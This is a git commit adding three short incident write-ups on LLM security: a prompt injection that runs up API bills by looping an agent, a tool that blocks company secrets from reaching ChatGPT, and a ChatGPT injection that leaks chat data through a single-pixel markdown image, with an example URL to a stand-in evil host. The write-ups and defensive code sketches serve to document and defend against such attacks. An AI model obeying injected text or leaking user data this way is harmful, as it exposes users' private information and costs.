Add incidents #1
pigri committed Jul 29, 2024
1 parent bba1481 commit 53c2cfd
Showing 3 changed files with 27 additions and 0 deletions.
@@ -0,0 +1,9 @@
+++
title = 'Prompt Injection Attack Against LLM App'
date = 2022-12-29
+++
🚨 Watch how I can run up a $1000 bill with a single call to a poorly protected LLM app 🚨

This article describes a prompt injection attack against an LLM agent: the attacker tricks the agent into repeatedly calling the LLM and SerpAPI, quickly racking up API costs. The attack shows how vulnerabilities in large language model applications can be exploited to inflict significant financial damage.
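
The straightforward mitigation is a hard budget on agent loops. Below is a minimal sketch of that idea; all names are hypothetical stand-ins (`llm_call` and `search_tool` take the place of real LLM and SerpAPI clients), not the code from the incident:

```python
# Sketch of a budget guard for an agent loop. All names here are
# illustrative stand-ins, not the APIs from the incident.

MAX_STEPS = 5        # hard ceiling on reasoning/tool steps per request
MAX_COST_USD = 0.50  # abort once the estimated spend crosses this

def run_agent(user_input, llm_call, search_tool, cost_per_step=0.02):
    """Toy agent loop; llm_call and search_tool stand in for real clients."""
    spent, context = 0.0, user_input
    for step in range(MAX_STEPS):
        spent += cost_per_step
        if spent > MAX_COST_USD:
            raise RuntimeError(f"budget exceeded after {step} steps")
        action = llm_call(context)              # model picks the next action
        if action.startswith("FINAL:"):         # model signals it is done
            return action.removeprefix("FINAL:").strip()
        context += "\n" + search_tool(action)   # e.g. a web-search lookup
    raise RuntimeError("step limit reached without a final answer")
```

Without such caps, an injected prompt that keeps the loop from ever reaching a final answer turns every user request into an unbounded stream of billable calls.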

[More details here](https://twitter.com/hwchase17/status/1608467493877579777)
@@ -0,0 +1,9 @@
+++
title = 'AI Data Leak Crisis: New Tool Prevents Company Secrets from Being Fed to ChatGPT'
date = 2023-04-25
+++
The meteoric rise in everyday use of artificial intelligence has raised the risk of workers inadvertently leaking sensitive company data to AI-powered tools like ChatGPT. Samsung recently experienced such leaks after employees pasted source code into the chatbot, potentially exposing proprietary information.

Tech entrepreneur Wayne Chang has developed LLM Shield, a new tool to block leaks of sensitive data to large language models like ChatGPT. LLM Shield uses "technology to fight technology" by scanning everything downloaded or transmitted by a worker and blocking sensitive data from being entered into AI tools, including ChatGPT, Google's Bard, and Microsoft's Bing.
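
LLM Shield's internals are not public. A minimal sketch of the general approach, assuming a simple pattern-based scanner that gates outbound text before it reaches an AI tool:

```python
import re

# Two illustrative detectors; a production scanner would use many more.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                      # AWS access key ID
    re.compile(r"-----BEGIN (?:RSA )?PRIVATE KEY-----"),  # PEM private key
]

def gate_outbound_text(text: str) -> str:
    """Refuse to forward text that appears to contain a secret."""
    for pattern in SECRET_PATTERNS:
        if pattern.search(text):
            raise PermissionError("blocked: message appears to contain a secret")
    return text  # deemed safe to send to ChatGPT, Bard, Bing, etc.
```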

[More details here](https://www.foxbusiness.com/technology/ai-data-leak-crisis-new-tool-prevents-company-secrets-being-fed-chatgpt)
@@ -0,0 +1,9 @@
+++
title = 'ChatGPT Prompt Injection Attack via Single-Pixel Image'
date = 2023-05-29
+++
A new prompt injection attack targets users of the ChatGPT web version: it modifies the chatbot's answers to include an invisible single-pixel markdown image that exfiltrates sensitive chat data to a malicious third party. The injection can be made persistent, affecting all future answers. It combines a set of tricks to deceive users without exploiting any software vulnerabilities.

The attack scenario involves a user copying text from an attacker’s website, with the malicious prompt injected into the copied text. When the user sends this text to ChatGPT, the chatbot appends a single-pixel image to its response, sending the sensitive data to the attacker’s server. This can lead to sensitive data leakage, insertion of phishing links, and pollution of ChatGPT output.
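
One client-side defense is to refuse to render external images in model output. A minimal, hypothetical sketch of that idea (regex-based, for illustration only; not what OpenAI shipped):

```python
import re

# Markdown image syntax is ![alt](url); a single-pixel image pointing at an
# attacker's server leaks whatever the injected prompt told the model to
# encode into the URL, e.g. ![](https://evil.example/p.png?q=<chat-data>).
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)]+)\)")

def neutralize_images(answer: str) -> str:
    """Replace external images in model output with inert text before rendering."""
    return MD_IMAGE.sub(lambda m: f"[image removed: {m.group(1)}]", answer)

print(neutralize_images("Done! ![](https://evil.example/p.png?q=secret)"))
# -> Done! [image removed: https://evil.example/p.png?q=secret]
```

Since the exfiltration only fires when the client fetches the image URL, stripping or rewriting external images before rendering cuts off the channel even if the injection itself succeeds.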

[More details here](https://systemweakness.com/new-prompt-injection-attack-on-chatgpt-web-version-ef717492c5c2)
